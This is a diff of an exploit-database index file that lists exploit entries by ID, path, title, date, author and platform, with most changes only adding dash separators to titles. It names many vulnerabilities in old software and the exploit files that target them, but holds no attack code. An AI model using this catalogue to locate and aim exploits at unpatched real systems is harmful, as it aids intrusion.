25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 -25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 +25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 @@ -22330,7 +22330,7 @@ id,file,description,date,author,platform,type,port 25174,platforms/php/webapps/25174.txt,"phpCOIN 1.2 mod.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25175,platforms/php/webapps/25175.txt,"phpCOIN 1.2 - login.php Multiple Parameter XSS",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 -25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 X-Forwarded-For Script Injection",2005-03-01,FraMe,php,webapps,0 +25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - X-Forwarded-For Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 @@ -22338,7 +22338,7 @@ id,file,description,date,author,platform,type,port 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 -25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 +25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0 @@ -22349,7 +22349,7 @@ id,file,description,date,author,platform,type,port 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote,0 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 25207,platforms/windows/remote/25207.txt,"py software active webcam webserver 4.3/5.5 - Multiple Vulnerabilities",2005-03-10,Sowhat,windows,remote,0 -25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 adm-photo.php Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 +25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 adm-photo.php - Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 25209,platforms/multiple/remote/25209.pl,"MySQL 4.x - CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote,0 25210,platforms/multiple/remote/25210.php,"MySQL 4.x - CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote,0 25211,platforms/multiple/remote/25211.c,"MySQL 4.x - CREATE TEMPORARY TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote,0 @@ -22411,7 +22411,7 @@ id,file,description,date,author,platform,type,port 25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 25270,platforms/php/webapps/25270.txt,"Topic Calendar 1.0.1 Calendar_Scheduler.php Cross-Site Scripting",2004-03-24,"Alberto Trivero",php,webapps,0 -25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 +25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 main.php - Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - Index.php Cross-Site Scripting",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - Index.php SQL Injection",2005-03-24,mircia,php,webapps,0 25274,platforms/windows/remote/25274.html,"Maxthon Web Browser 1.2 - Search Bar Information Disclosure",2005-03-25,"Aviv Raff",windows,remote,0 @@ -22421,7 +22421,7 @@ id,file,description,date,author,platform,type,port 25278,platforms/php/webapps/25278.sh,"ESMI PayPal Storefront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25279,platforms/php/webapps/25279.txt,"ESMI PayPal Storefront 1.7 products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 25280,platforms/php/webapps/25280.txt,"ESMI PayPal Storefront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 -25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 +25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 25282,platforms/php/webapps/25282.txt,"Nuke Bookmarks 0.6 Marks.php Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke Bookmarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 @@ -22434,13 +22434,13 @@ id,file,description,date,author,platform,type,port 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 Firmware - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25775,platforms/linux/remote/25775.rb,"Nginx HTTP Server 1.3.9-1.4.0 - Chuncked Encoding Stack Buffer Overflow",2013-05-28,Metasploit,linux,remote,80 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0 -25296,platforms/windows/local/25296.rb,"AudioCoder .M3U Buffer Overflow",2013-05-07,Metasploit,windows,local,0 +25296,platforms/windows/local/25296.rb,"AudioCoder - .M3U Buffer Overflow",2013-05-07,Metasploit,windows,local,0 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox Query Parameter URI Redirection",2005-03-28,CorryL,php,webapps,0 25300,platforms/php/webapps/25300.txt,"EXoops Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 -25302,platforms/php/webapps/25302.txt,"phpCOIN 1.2 auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 +25302,platforms/php/webapps/25302.txt,"phpCOIN 1.2 auxpage.php page Parameter Traversal - Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure Exploit",2013-05-08,HTP,multiple,webapps,0 @@ -22463,7 +22463,7 @@ id,file,description,date,author,platform,type,port 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 -25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 +25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 @@ -22475,7 +22475,7 @@ id,file,description,date,author,platform,type,port 25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local,0 25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos,0 25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server Remote Information Disclosure",2005-04-04,"Shalom Carmel",unix,remote,0 -25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT Arbitrary File Disclosure",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 +25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 Usrdetails.php Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x - Your_Account Module Username Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 @@ -22489,7 +22489,7 @@ id,file,description,date,author,platform,type,port 25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.ASP SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 25349,platforms/asp/webapps/25349.txt,"Active Auction House - account.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 -25350,platforms/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps,0 +25350,platforms/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script - Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps,0 25351,platforms/asp/webapps/25351.txt,"Active Auction House - Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.ASP Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25353,platforms/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service Remote Denial of Service",2005-04-06,anonymous,unix,dos,0 @@ -22501,9 +22501,9 @@ id,file,description,date,author,platform,type,port 25359,platforms/hardware/remote/25359.txt,"Linksys WET11 Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module Multiple SQL Injection",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25361,platforms/irix/local/25361.txt,"SGI IRIX 6.5.22 GR_OSView Information Disclosure",2005-04-07,anonymous,irix,local,0 -25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 +25362,platforms/irix/local/25362.txt,"SGI IRIX 6.5.22 GR_OSView Local - Arbitrary File Overwrite",2005-04-07,anonymous,irix,local,0 25363,platforms/windows/dos/25363.py,"Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH",2013-05-11,ariarat,windows,dos,0 -25364,platforms/windows/dos/25364.txt,"AN HTTPD CMDIS.DLL Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 +25364,platforms/windows/dos/25364.txt,"AN HTTPD - CMDIS.DLL Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",windows,dos,0 25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 @@ -22530,9 +22530,9 @@ id,file,description,date,author,platform,type,port 25388,platforms/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU DoS",2005-04-12,"Fernando Gont",multiple,dos,0 25389,platforms/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - DoS",2005-04-12,"Fernando Gont",multiple,dos,0 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 Comersus_Search_Item.ASP Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0 -25391,platforms/multiple/remote/25391.txt,"XAMPP Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 +25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0 25392,platforms/linux/remote/25392.c,"Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote,0 -25393,platforms/multiple/dos/25393.txt,"XAMPP Insecure Default Password Disclosure",2005-04-12,"Morning Wood",multiple,dos,0 +25393,platforms/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",multiple,dos,0 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart Index.php Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0 25395,platforms/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 MimeBodyPart.getFileName Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote,0 25396,platforms/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x - Database Multiple SQL Injection",2005-04-13,"Esteban Martinez Fayo",multiple,remote,0 @@ -22583,25 +22583,25 @@ id,file,description,date,author,platform,type,port 25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,windows,dos,0 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1)",2013-05-14,sd,linux,local,0 -25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 -25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 +25445,platforms/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 +25446,platforms/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution",2013-05-14,Metasploit,multiple,remote,8000 25447,platforms/php/webapps/25447.txt,"AlienVault OSSIM 4.1.2 - Multiple SQL Injection",2013-05-14,RunRunLevel,php,webapps,0 -25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 ERS File Handling Buffer Overflow",2013-05-14,Metasploit,windows,local,0 +25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - ERS File Handling Buffer Overflow",2013-05-14,Metasploit,windows,local,0 25449,platforms/php/webapps/25449.txt,"UMI.CMS 2.9 - CSRF",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0 25451,platforms/php/webapps/25451.txt,"PHPBB 1.x/2.0.x - Knowledge Base Module KB.php SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 25452,platforms/multiple/remote/25452.pl,"Oracle 10g Database SUBSCRIPTION_NAME SQL Injection (1)",2007-02-23,bunker,multiple,remote,0 25453,platforms/multiple/remote/25453.pl,"Oracle 10g Database SUBSCRIPTION_NAME SQL Injection (2)",2007-02-26,bunker,multiple,remote,0 -25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote,0 +25454,platforms/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote,0 25455,platforms/asp/webapps/25455.txt,"OneWorldStore DisplayResults.ASP SQL Injection",2005-04-19,Lostmon,asp,webapps,0 25456,platforms/asp/webapps/25456.txt,"OneWorldStore DisplayResults.ASP Cross-Site Scripting",2005-04-19,Lostmon,asp,webapps,0 25457,platforms/php/webapps/25457.c,"UBBCentral 6.0 UBB.threads Printthread.php SQL Injection",2005-03-11,HLL,php,webapps,0 25458,platforms/php/webapps/25458.txt,"CityPost PHP LNKX 52.0 Message.php Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 25459,platforms/php/webapps/25459.txt,"CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 25464,platforms/php/webapps/25464.txt,"CityPost Simple PHP Upload Simple-upload-53.php Cross-Site Scripting",2005-04-19,Thom,php,webapps,0 -25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script Denial of Service",2005-04-20,anonymous,linux,dos,0 +25465,platforms/linux/dos/25465.txt,"Logwatch 2.6 Secure Script - Denial of Service",2005-04-20,anonymous,linux,dos,0 25466,platforms/asp/webapps/25466.txt,"ECommPro 3.0 - Admin/Login.ASP SQL Injection",2005-04-20,c0d3r,asp,webapps,0 -25467,platforms/php/webapps/25467.txt,"Netref 4.2 Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 +25467,platforms/php/webapps/25467.txt,"Netref 4.2 - Cat_for_gen.php Remote PHP Script Injection",2005-04-20,jaguar,php,webapps,0 25468,platforms/php/webapps/25468.txt,"PHP Labs proFile Dir URI Variable Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25469,platforms/php/webapps/25469.txt,"Ocean12 Calendar Manager 1.0 - Admin Form SQL Injection",2005-04-20,Zinho,php,webapps,0 25470,platforms/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",multiple,dos,0 @@ -22658,8 +22658,8 @@ id,file,description,date,author,platform,type,port 25522,platforms/asp/webapps/25522.txt,"CartWIZ 1.10 - SearchResults.ASP Name Argument Cross-Site Scripting",2005-04-23,Dcrab,asp,webapps,0 25523,platforms/php/webapps/25523.txt,"PHPBB 2.0.x - Profile.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 25524,platforms/php/webapps/25524.txt,"PHPBB 2.0.x - Viewtopic.php Cross-Site Scripting",2005-04-23,HaCkZaTaN,php,webapps,0 -25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index (1)",2005-04-25,kf,linux,dos,0 -25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 Signed Buffer Index (2)",2005-04-25,kf,linux,remote,0 +25525,platforms/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (1)",2005-04-25,kf,linux,dos,0 +25526,platforms/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (2)",2005-04-25,kf,linux,remote,0 25527,platforms/linux/dos/25527.txt,"ImageMagick 6.x - .PNM Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",linux,dos,0 25528,platforms/php/webapps/25528.txt,"WoltLab Burning Board 2.3.1 PMS.php Cross-Site Scripting",2005-04-25,deluxe89,php,webapps,0 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - Default.ASP Multiple SQL Injection",2005-04-25,Dcrab,asp,webapps,0 @@ -22694,7 +22694,7 @@ id,file,description,date,author,platform,type,port 25558,platforms/php/webapps/25558.txt,"Notes Module for PHPBB SQL Injection",2005-04-28,"James Bercegay",php,webapps,0 25559,platforms/multiple/remote/25559.txt,"Oracle Application Server 9.0 HTTP Service Mod_Access Restriction Bypass",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25560,platforms/php/webapps/25560.txt,"Just William's Amazon Webstore Closeup.php Image Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 -25561,platforms/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",multiple,remote,0 +25561,platforms/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache - Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25562,platforms/multiple/remote/25562.txt,"Oracle Application Server 9i Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25563,platforms/multiple/remote/25563.txt,"Oracle Application Server 9i Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote,0 25564,platforms/php/webapps/25564.txt,"Just William's Amazon Webstore CurrentIsExpanded Parameter Cross-Site Scripting",2005-04-28,Lostmon,php,webapps,0 @@ -22805,7 +22805,7 @@ id,file,description,date,author,platform,type,port 25665,platforms/php/webapps/25665.txt,"PostNuke 0.75/0.76 Blocks Module Directory Traversal",2005-05-16,pokley,php,webapps,0 25666,platforms/cgi/webapps/25666.txt,"PServ 3.2 - Remote Source Code Disclosure",2005-05-16,"Claus R. F. Overbeck",cgi,webapps,0 25667,platforms/asp/webapps/25667.txt,"MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting",2005-05-16,"Dedi Dwianto",asp,webapps,0 -25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 Sigmaweb.DLL SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 +25668,platforms/cgi/webapps/25668.txt,"Sigma ISP Manager 6.6 - Sigmaweb.DLL SQL Injection",2005-05-16,"mehran gashtasebi",cgi,webapps,0 25669,platforms/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",linux,remote,0 25670,platforms/multiple/remote/25670.html,"Mozilla Suite And Firefox DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote,0 25671,platforms/php/webapps/25671.txt,"NPDS 4.8/5.0 - comments.php thold Parameter SQL Injection",2005-05-16,NoSP,php,webapps,0 @@ -22818,7 +22818,7 @@ id,file,description,date,author,platform,type,port 25678,platforms/php/webapps/25678.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal_mitgraf.php year Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25679,platforms/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 jgs_portal_sponsor.php id Parameter SQL Injection",2005-05-16,deluxe@security-project.org,php,webapps,0 25680,platforms/windows/dos/25680.txt,"War Times Remote Game Server Denial of Service",2005-05-17,"Luigi Auriemma",windows,dos,0 -25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 X-ForwordedFor PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 +25681,platforms/php/webapps/25681.php,"FusionPHP Fusion News 3.3/3.6 - X-ForwordedFor PHP Script Code Injection",2005-05-24,"Network security team",php,webapps,0 25682,platforms/php/webapps/25682.txt,"WordPress 1.5 - Post.php Cross-Site Scripting",2005-05-17,"Thomas Waldegger",php,webapps,0 25683,platforms/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",php,webapps,0 25684,platforms/hardware/remote/25684.html,"D-Link DSL Router Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote,0 @@ -22849,7 +22849,7 @@ id,file,description,date,author,platform,type,port 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 - Insecure File Creation",2005-05-26,"Eric Romang",linux,local,0 25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote,0 -25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 +25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0 25714,platforms/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 (SASspk.dll) - Stack-Based Overflow",2013-05-26,LiquidWorm,windows,dos,0 @@ -22872,7 +22872,7 @@ id,file,description,date,author,platform,type,port 25734,platforms/php/webapps/25734.txt,"BookReview 1.0 - add_classification.htm isbn Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25735,platforms/php/webapps/25735.txt,"BookReview 1.0 suggest_review.htm node Parameter XSS",2005-05-26,Lostmon,php,webapps,0 25736,platforms/hardware/dos/25736.txt,"Nokia 9500 vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 -25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 +25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE - User32.DLL Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 25738,platforms/jsp/webapps/25738.txt,"BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25739,platforms/jsp/webapps/25739.txt,"BEA WebLogic 7.0/8.1 - Administration Console Error Page Cross-Site Scripting",2005-05-27,"Team SHATTER",jsp,webapps,0 25740,platforms/php/webapps/25740.txt,"JAWS Glossary 0.4/0.5 - Cross-Site Scripting",2005-05-27,Nah,php,webapps,0 @@ -22962,7 +22962,7 @@ id,file,description,date,author,platform,type,port 